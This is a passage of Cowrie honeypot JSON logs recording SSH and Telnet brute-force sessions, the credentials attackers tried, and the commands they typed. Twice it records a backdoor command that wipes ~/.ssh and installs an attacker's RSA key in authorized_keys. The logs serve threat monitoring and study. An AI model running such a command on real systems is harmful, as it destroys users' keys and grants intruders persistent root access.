6@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:21:46.396024Z","src_ip":"212.227.235.229","session":"a215cb355b60"}
{"eventid":"cowrie.login.success","username":"root","password":"P@Ssw0rd@321","message":"login attempt [root/P@Ssw0rd@321] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:21:46.773571Z","src_ip":"212.227.235.229","session":"a215cb355b60"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:21:46.960815Z","src_ip":"212.227.235.229","session":"a215cb355b60"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:21:46.961618Z","src_ip":"212.227.235.229","session":"a215cb355b60"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:21:46.962707Z","src_ip":"212.227.235.229","session":"a215cb355b60"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:21:47.047623Z","src_ip":"212.227.235.229","session":"a215cb355b60"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:21:47.326572Z","src_ip":"212.227.235.229","session":"a215cb355b60"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T08:21:47.327294Z","src_ip":"212.227.235.229","session":"a215cb355b60"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T08:21:47.413576Z","src_ip":"212.227.235.229","session":"a215cb355b60"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:21:47.414374Z","src_ip":"212.227.235.229","session":"a215cb355b60"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54174,"dst_ip":"1.2.3.4","dst_port":22,"session":"95b2287fba3b","protocol":"ssh","message":"New connection: 212.227.235.229:54174 (1.2.3.4:22) [session: 95b2287fba3b]","sensor":"my-vps","timestamp":"2025-09-09T08:21:47.496139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:21:47.499521Z","src_ip":"212.227.235.229","session":"95b2287fba3b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:21:47.584470Z","src_ip":"212.227.235.229","session":"95b2287fba3b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T08:21:47.919136Z","src_ip":"212.227.235.229","session":"95b2287fba3b"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:21:49.006054Z","src_ip":"212.227.235.229","session":"95b2287fba3b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54182,"dst_ip":"1.2.3.4","dst_port":22,"session":"805aa26e978f","protocol":"ssh","message":"New connection: 212.227.235.229:54182 (1.2.3.4:22) [session: 805aa26e978f]","sensor":"my-vps","timestamp":"2025-09-09T08:21:49.089791Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:21:49.090726Z","src_ip":"212.227.235.229","session":"805aa26e978f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:21:49.183844Z","src_ip":"212.227.235.229","session":"805aa26e978f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:21:49.569494Z","src_ip":"212.227.235.229","session":"805aa26e978f"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:21:49.657302Z","src_ip":"212.227.235.229","session":"a215cb355b60"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:21:49.658588Z","src_ip":"212.227.235.229","session":"805aa26e978f"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56656,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d59b32394d7","protocol":"ssh","message":"New connection: 217.72.205.35:56656 (1.2.3.4:22) [session: 7d59b32394d7]","sensor":"my-vps","timestamp":"2025-09-09T08:21:56.667133Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:21:56.668268Z","src_ip":"217.72.205.35","session":"7d59b32394d7"}
{"eventid":"cowrie.session.connect","src_ip":"3.132.23.201","src_port":45628,"dst_ip":"1.2.3.4","dst_port":23,"session":"8a043925dc0d","protocol":"telnet","message":"New connection: 3.132.23.201:45628 (1.2.3.4:23) [session: 8a043925dc0d]","sensor":"my-vps","timestamp":"2025-09-09T08:22:28.082430Z"}
{"eventid":"cowrie.session.closed","duration":0.0014290809631347656,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:22:28.083787Z","src_ip":"3.132.23.201","session":"8a043925dc0d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56320,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac5f310de58d","protocol":"ssh","message":"New connection: 212.227.235.229:56320 (1.2.3.4:22) [session: ac5f310de58d]","sensor":"my-vps","timestamp":"2025-09-09T08:23:00.041407Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:23:00.043213Z","src_ip":"212.227.235.229","session":"ac5f310de58d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:23:00.127981Z","src_ip":"212.227.235.229","session":"ac5f310de58d"}
{"eventid":"cowrie.login.success","username":"root","password":"qwe123$%^","message":"login attempt [root/qwe123$%^] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:23:00.509161Z","src_ip":"212.227.235.229","session":"ac5f310de58d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:23:00.740043Z","src_ip":"212.227.235.229","session":"ac5f310de58d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:23:00.740794Z","src_ip":"212.227.235.229","session":"ac5f310de58d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:23:00.741891Z","src_ip":"212.227.235.229","session":"ac5f310de58d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:23:00.827684Z","src_ip":"212.227.235.229","session":"ac5f310de58d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:23:01.018645Z","src_ip":"212.227.235.229","session":"ac5f310de58d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T08:23:01.019687Z","src_ip":"212.227.235.229","session":"ac5f310de58d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T08:23:01.107907Z","src_ip":"212.227.235.229","session":"ac5f310de58d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:23:01.108642Z","src_ip":"212.227.235.229","session":"ac5f310de58d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56334,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8444dc19850","protocol":"ssh","message":"New connection: 212.227.235.229:56334 (1.2.3.4:22) [session: c8444dc19850]","sensor":"my-vps","timestamp":"2025-09-09T08:23:01.189660Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:23:01.190551Z","src_ip":"212.227.235.229","session":"c8444dc19850"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:23:01.284009Z","src_ip":"212.227.235.229","session":"c8444dc19850"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T08:23:01.666832Z","src_ip":"212.227.235.229","session":"c8444dc19850"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:23:02.752996Z","src_ip":"212.227.235.229","session":"c8444dc19850"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45604,"dst_ip":"1.2.3.4","dst_port":22,"session":"3368c200e34b","protocol":"ssh","message":"New connection: 212.227.235.229:45604 (1.2.3.4:22) [session: 3368c200e34b]","sensor":"my-vps","timestamp":"2025-09-09T08:23:02.836559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:23:02.837512Z","src_ip":"212.227.235.229","session":"3368c200e34b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:23:02.921074Z","src_ip":"212.227.235.229","session":"3368c200e34b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:23:03.297302Z","src_ip":"212.227.235.229","session":"3368c200e34b"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:23:03.385295Z","src_ip":"212.227.235.229","session":"ac5f310de58d"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:23:03.386433Z","src_ip":"212.227.235.229","session":"3368c200e34b"}
{"eventid":"cowrie.session.connect","src_ip":"3.132.23.201","src_port":41566,"dst_ip":"1.2.3.4","dst_port":23,"session":"c24a11749299","protocol":"telnet","message":"New connection: 3.132.23.201:41566 (1.2.3.4:23) [session: c24a11749299]","sensor":"my-vps","timestamp":"2025-09-09T08:24:05.866352Z"}
{"eventid":"cowrie.session.closed","duration":9.999876260757446,"message":"Connection lost after 9 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:24:15.866160Z","src_ip":"3.132.23.201","session":"c24a11749299"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50131,"dst_ip":"1.2.3.4","dst_port":23,"session":"4cb204323b06","protocol":"telnet","message":"New connection: 212.227.125.160:50131 (1.2.3.4:23) [session: 4cb204323b06]","sensor":"my-vps","timestamp":"2025-09-09T08:25:07.195153Z"}
{"eventid":"cowrie.session.closed","duration":12.690927982330322,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:25:19.886003Z","src_ip":"212.227.125.160","session":"4cb204323b06"}
{"eventid":"cowrie.session.connect","src_ip":"3.132.23.201","src_port":52332,"dst_ip":"1.2.3.4","dst_port":23,"session":"6326d1040031","protocol":"telnet","message":"New connection: 3.132.23.201:52332 (1.2.3.4:23) [session: 6326d1040031]","sensor":"my-vps","timestamp":"2025-09-09T08:25:31.925114Z"}
{"eventid":"cowrie.session.closed","duration":10.133112907409668,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:25:42.058152Z","src_ip":"3.132.23.201","session":"6326d1040031"}
{"eventid":"cowrie.session.connect","src_ip":"3.132.23.201","src_port":46366,"dst_ip":"1.2.3.4","dst_port":23,"session":"76d4118d2a24","protocol":"telnet","message":"New connection: 3.132.23.201:46366 (1.2.3.4:23) [session: 76d4118d2a24]","sensor":"my-vps","timestamp":"2025-09-09T08:26:00.340747Z"}
{"eventid":"cowrie.session.closed","duration":0.0012507438659667969,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:26:00.341907Z","src_ip":"3.132.23.201","session":"76d4118d2a24"}
{"eventid":"cowrie.session.connect","src_ip":"36.95.167.162","src_port":12802,"dst_ip":"1.2.3.4","dst_port":22,"session":"c744904273b3","protocol":"ssh","message":"New connection: 36.95.167.162:12802 (1.2.3.4:22) [session: c744904273b3]","sensor":"my-vps","timestamp":"2025-09-09T08:26:11.109986Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ROSSSH","message":"Remote SSH version: SSH-2.0-ROSSSH","sensor":"my-vps","timestamp":"2025-09-09T08:26:11.546739Z","src_ip":"36.95.167.162","session":"c744904273b3"}
{"eventid":"cowrie.client.kex","hassh":"e7c5793d3b7d9f4dd6bd9e027595e061","hasshAlgorithms":"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512;aes128-cbc,aes192-cbc,aes256-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes1256-ctr;hmac-sha1,hmac-sha2-256,hmac-sha2-512;none","kexAlgs":["diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512"],"keyAlgs":["ssh-rsa","ssh-dss","rsa-sha2-256","rsa-sha2-512"],"encCS":["aes128-cbc","aes192-cbc","aes256-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes1256-ctr"],"macCS":["hmac-sha1","hmac-sha2-256","hmac-sha2-512"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e7c5793d3b7d9f4dd6bd9e027595e061","sensor":"my-vps","timestamp":"2025-09-09T08:26:12.125648Z","src_ip":"36.95.167.162","session":"c744904273b3"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-09-09T08:26:13.767267Z","src_ip":"36.95.167.162","session":"c744904273b3"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:26:15.468080Z","src_ip":"36.95.167.162","session":"c744904273b3"}
